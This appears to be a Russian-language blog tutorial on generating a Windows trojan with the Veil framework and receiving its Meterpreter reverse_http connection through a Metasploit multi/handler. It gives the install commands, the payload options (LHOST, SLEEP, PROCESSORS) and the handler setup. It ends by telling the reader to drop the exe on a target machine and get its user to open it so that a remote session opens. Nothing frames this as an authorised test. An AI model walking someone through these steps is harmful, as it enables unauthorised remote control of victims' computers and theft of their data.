March 14, 2020

Использования Veil + msf

Привет, ребята, в этот день я хочу рассказать вам, как создать бэкдор с Veil и как использовать его через Metasploit.

Veil-это инструмент, который содержит базу уязвимостей, которые используются для бэкдора, в готовом виде.

1-Установка

git clone https://github.com/Veil-Framework/Veil.git

давайте теперь наберем и войдем в папку конфигурации в папке Veil и запустим setup.sh

  • cd Veil/config
  • bash setup.sh

Continue with installation?отвечаем на вопрос "да".

Если установка завершилась успешно то мы увидим это

Теперь он будет выполнять установку Python через Wine.

Потому что Wine поможет нам запустить приложения для Windows на Linux, поэтому он установит версию Windows Python на наш Kali.

Сразу после этого придет установка версии Windows Ruby.

Теперь нам выскочит предупреждения

Здесь он спросит вас, существует одна и таже папка хотим ли мы продолжить установку?

Отвечаем " да " и выполняем установку Ruby.

На этот раз он попросит нас выполнить установку AutoIt.

Это язык программирования в AutoIt, и для этого нам нужно настроить его.

Потом выберите x86, если ваша система 32-битная, а 64-битная то используем нативную для х64

Дальше

apt -y install veil

после того, как это будет сделано, давайте запустим команду ниже:

 /usr/share/veil/config/setup.sh --force --silent

после того, как вы это сделаете, мы увидим этот экран

cd Veil
./Veil.py

После чего пишем use 1

Тепер мы увидим, что есть 41 пейлоад.

Чтобы увидеть : list

И увидим такой список

Отсюда мы выбираем пейлоад, который мы хотим использовать, в качестве примера я выберу пейлоад 9.

После того, как вы выберете пейлоад, который мы будем использовать, появится экран для внесения необходимых настроек

Вот части, которые мы должны отредактировать:

LHOST

PROCESSORS

SLEEP

LHOST= если мы собираемся атаковать удаленный компьютер,в нашей сети,то пишем ifconfig, и получаем локальный айпи в этой сети set LHOST ip

Дальше настраиваем эти параметры

set SLEEP 
set PROCESSORS 

После этих манипуляций прописываем generate

Далее запускаем msf и прописываем

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_http


Show options

давайте напишем и перейдем к экрану настроек.

Здесь мы должны написать Lhost наш ip-адрес нашего Кали.

После того, как мы сделаем наши настройки, мы должны ввести exploit и бросить троянец, который мы создали, на целевой компьютер.

Затем мы откроем созданный exe-файл пользователю целевого компьютера и подождем входа в систему из Metasploit.

Затем мы можем переключаться между файлами с помощью команд Linux.